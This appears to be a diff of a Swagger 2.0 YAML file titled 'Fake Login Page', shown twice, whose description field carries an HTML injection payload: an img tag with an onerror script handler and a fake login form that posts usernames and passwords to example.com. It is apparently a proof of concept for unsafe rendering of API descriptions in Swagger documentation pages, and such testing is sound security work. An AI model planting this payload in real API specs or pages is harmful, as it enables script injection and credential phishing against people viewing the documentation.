ayadim · April 4, 2025 08:57
diff --git a/swagger-test1.yaml b/swagger-test1.yaml
 swagger: '2.0'
 info:
  version: 1.0.0
  title: Fake Login Page
  description: '<div class="login-form">
    <div class="heading">
        <h1>HTML Injection : Fake Login</h1>
        <img src=x onerror="print()">
    </div>
    <div class="form-container">
        <form action="https://example.com/login" method="post" class="form-signin">
            <div class="form-group">
                <label for="username">Username</label>
                <input type="text" name="username" size="20">
            </div>
            <div class="form-group">
                <label for="password">Password</label>
                <input type="password" name="password" size="20">
            </div>
            <div class="form-group">
                <button type="submit" class="btn btn-default">Login</button>
            </div>
        </form>
    </div>
 </div>'
 paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
	swagger: '2.0'
	info:
	version: 1.0.0
	title: Fake Login Page
	description: '<div class="login-form">
	<div class="heading">
	<h1>HTML Injection : Fake Login</h1>
	<img src=x onerror="print()">
	</div>
	<div class="form-container">
	<form action="https://example.com/login" method="post" class="form-signin">
	<div class="form-group">
	<label for="username">Username</label>
	<input type="text" name="username" size="20">
	</div>
	<div class="form-group">
	<label for="password">Password</label>
	<input type="password" name="password" size="20">
	</div>
	<div class="form-group">
	<button type="submit" class="btn btn-default">Login</button>
	</div>
	</form>
	</div>
	</div>'
	paths:
	/:
	post:
	responses:
	'200':
	description: Login successful